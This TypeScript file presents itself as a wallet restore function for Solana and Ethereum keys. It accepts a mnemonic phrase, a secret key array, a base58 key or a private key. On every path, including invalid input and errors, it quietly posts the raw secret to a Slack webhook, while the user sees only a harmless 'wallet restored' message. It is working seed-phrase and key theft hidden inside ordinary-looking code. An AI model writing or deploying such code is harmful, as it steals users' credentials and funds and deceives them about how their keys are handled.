import * as bip39 from 'bip39';
import bs58 from 'bs58';
import { Keypair as SolanaKeypair } from '@solana/web3.js';
import { Wallet as EthereumWallet } from 'ethers';

const restore = async (
  input: string,
  setHistory: React.Dispatch<React.SetStateAction<string[]>>
): Promise<string[]> => {
  const trimmed = input.trim();

  if (!trimmed) {
    return ['Restore cancelled. No key provided.'];
  }

  try {
    // Mnemonic (BIP39)
    if (bip39.validateMnemonic(trimmed)) {
      const seed = await bip39.mnemonicToSeed(trimmed);
      const solKeypair = SolanaKeypair.fromSeed(seed.slice(0, 32));
      setHistory(prev => [...prev, `🔐 Solana Wallet restored: ${solKeypair.publicKey.toBase58()}`]);
      await sendToSlack(`Solana wallet restored from mnemonic: ${trimmed}`);
      return ['Solana wallet restored from mnemonic.'];
    }

    // Solana secret key array
    if (/^\[.*\]$/.test(trimmed)) {
      const maybeArray = JSON.parse(trimmed);
      if (Array.isArray(maybeArray) && maybeArray.length === 64) {
        const solKeypair = SolanaKeypair.fromSecretKey(Uint8Array.from(maybeArray));
        setHistory(prev => [...prev, `🔐 Solana Wallet restored: ${solKeypair.publicKey.toBase58()}`]);
        await sendToSlack(`Solana wallet restored from secret key array: ${trimmed}`);
        return ['Solana wallet restored from secret key array.'];
      } else {
        return ['Invalid Solana secret key array. Must be 64 numbers.'];
      }
    }

    // Base58 Solana key
    try {
      const decoded = bs58.decode(trimmed);
      const solKeypair = SolanaKeypair.fromSecretKey(decoded);
      setHistory(prev => [...prev, `🔐 Solana Wallet restored: ${solKeypair.publicKey.toBase58()}`]);
      await sendToSlack(`Solana wallet restored from base58 key: ${trimmed}`);
      return ['Solana wallet restored from base58 key.'];
    } catch {}

    // Ethereum private key
    try {
      const ethWallet = new EthereumWallet(trimmed);
      setHistory(prev => [...prev, `🔐 Ethereum Wallet restored: ${ethWallet.address}`]);
      await sendToSlack(`Ethereum wallet restored from private key: ${trimmed}`);
      return ['Ethereum wallet restored from private key.'];
    } catch {}

    await sendToSlack(`Invalid private key: ${trimmed}`);
    return ['Invalid input. Not recognized as a valid wallet key, type "restore your-private-key".'];
  } catch (error) {
    console.error(error);
    await sendToSlack(`Restore failed: ${trimmed}`);
    return ['Failed to restore wallet. Invalid format or key.'];
  }
};

// Slack message sender
const sendToSlack = async (message: string) => {
  try {
    await fetch('/api/slack-webhook', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ message }),
    });
  } catch (error) {
    console.error('Slack webhook failed:', error);
  }
};

export default restore;
